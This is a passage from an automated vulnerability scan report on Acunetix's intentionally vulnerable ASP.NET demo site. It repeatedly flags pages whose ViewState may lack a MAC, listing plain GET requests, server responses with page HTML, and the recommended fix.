style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 
13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 
26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p 
style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
Solution
Ensure the MAC is set for all pages on this website.
GET http://testaspnet.vulnweb.com/about.aspx
Alert tags
Alert description
*** EXPERIMENTAL ***
This website uses ASP.NET's Viewstate but maybe without any MAC.
Request
Request line and header section (314 bytes)
GET http://testaspnet.vulnweb.com/about.aspx HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:17 GMT
Content-Length: 14467
Response body (14467 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>About</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="about.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability 
Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. 
Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/"> offices</A> in Malta, US and the UK. 
</P> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td 
align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. 
This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
Solution
Ensure the MAC is set for all pages on this website.
GET http://testaspnet.vulnweb.com/Comments.aspx?id=0
Alert tags
Alert description
*** EXPERIMENTAL ***
This website uses ASP.NET's Viewstate but maybe without any MAC.
Request
Request line and header section (322 bytes)
GET http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:18 GMT
Content-Length: 13707
Response body (13707 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk/TUy" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a 
href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a> <DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG 
Solution
Ensure the MAC is set for all pages on this website.
GET http://testaspnet.vulnweb.com/default.aspx
Alert tags
Alert description
*** EXPERIMENTAL ***
This website uses ASP.NET's Viewstate but maybe without any MAC.
Request
Request line and header section (316 bytes)
GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:17 GMT
Content-Length: 13912
Response body (13912 bytes)
Solution
Ensure the MAC is set for all pages on this website.
GET http://testaspnet.vulnweb.com/login.aspx
Alert tags
Alert description
*** EXPERIMENTAL ***
This website uses ASP.NET's Viewstate but maybe without any MAC.
Request
Request line and header section (314 bytes)
GET http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:17 GMT
Content-Length: 13269
Response body (13269 bytes)
Solution
Ensure the MAC is set for all pages on this website.
GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
Alert tags
Alert description
*** EXPERIMENTAL ***
This website uses ASP.NET's Viewstate but maybe without any MAC.
Request
Request line and header section (341 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=2
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:20 GMT
Content-Length: 30393
Response body (30393 bytes)
Solution
Ensure the MAC is set for all pages on this website.
GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
Alert tags
Alert description
*** EXPERIMENTAL ***
This website uses ASP.NET's Viewstate but maybe without any MAC.
Request
Request line and header section (341 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:20 GMT
Content-Length: 17827
Response body (17827 bytes)
Solution
Ensure the MAC is set for all pages on this website.
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
Alert tags
Alert description
*** EXPERIMENTAL ***
This website uses ASP.NET's Viewstate but maybe without any MAC.
Request
Request line and header section (342 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:18 GMT
Content-Length: 22752
Response body (22752 bytes)
Solution
Ensure the MAC is set for all pages on this website.
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
Alert tags
Alert description
*** EXPERIMENTAL ***
This website uses ASP.NET's Viewstate but maybe without any MAC.
Request
Request line and header section (342 bytes)
GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 HTTP/1.1
Host: testaspnet.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testaspnet.vulnweb.com
Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
Request body (0 bytes)
Response
Status line and header section (222 bytes)
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Jul 2022 13:05:18 GMT
Content-Length: 30454
Response body (30454 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; 